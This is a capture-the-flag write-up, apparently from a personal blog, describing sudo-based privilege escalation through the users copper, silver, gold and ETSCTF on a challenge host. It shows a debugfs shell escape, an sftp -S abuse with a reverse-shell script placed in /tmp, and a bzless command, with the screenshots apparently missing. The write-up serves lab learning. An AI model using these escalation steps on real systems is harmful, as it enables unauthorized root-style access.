Hack. Sleep. Repeat

View on GitHub

How’s your OS escalation skills? See if you can reach the final user (ETSCTF)

On each user you successfully escalate, there will be a flag on its home directory. This flag can also be used as a password to directly switch to that user (eg with su - copper) at a later time so that you dont have to go through all the steps every time you re-connect.

To start the challenge connect with nc -t 1337, or telnet 1337. Your timer starts from the first time you connect to the service.

Let jump in without wasting to much of time.

Shell As Silver

└─$ nc -t 1337
copper@anvil:~$ sudo -l
sudo -l
User copper may run the following commands on anvil:
    (silver) NOPASSWD: /sbin/debugfs
copper@anvil:~$ id
uid=1001(copper) gid=1001(copper) groups=1001(copper)
copper@anvil:~$ sudo -u silver /sbin/debugfs
sudo -u silver /sbin/debugfs
debugfs 1.44.5 (15-Dec-2018)
debugfs:  !sh
$ id
uid=1002(silver) gid=1002(silver) groups=1002(silver)

So i confirm if i can run sudo with any command luckily i got /sbin/debugfs which was exploited above let move to another user.

Shell As Gold

silver@anvil:/home/copper$ sudo -l
sudo -l
User silver may run the following commands on anvil:
    (gold) NOPASSWD: /usr/bin/sftp

Seems we can run sftp with sudo which is cool let exploit it.


But seems like a dead we know SSH port running interesting so i decided to host an SSH port on the target using SimpleHTTPServer .


Ready and running let try it again.


Seems like a dead end again i can’t create .ssh directory so i change directory to /tmp to host a bash shell in a file with a reverse shell payload in it.


But ready and making it executable also with an Ncat listener on now let hit it.

sudo -u gold /usr/bin/sftp -S /tmp/ muzec@localhost


Boom we have shell.



sudo -u ETSCTF /bin/bzless -h



We are done.

Greeting From Muzec

Back To Home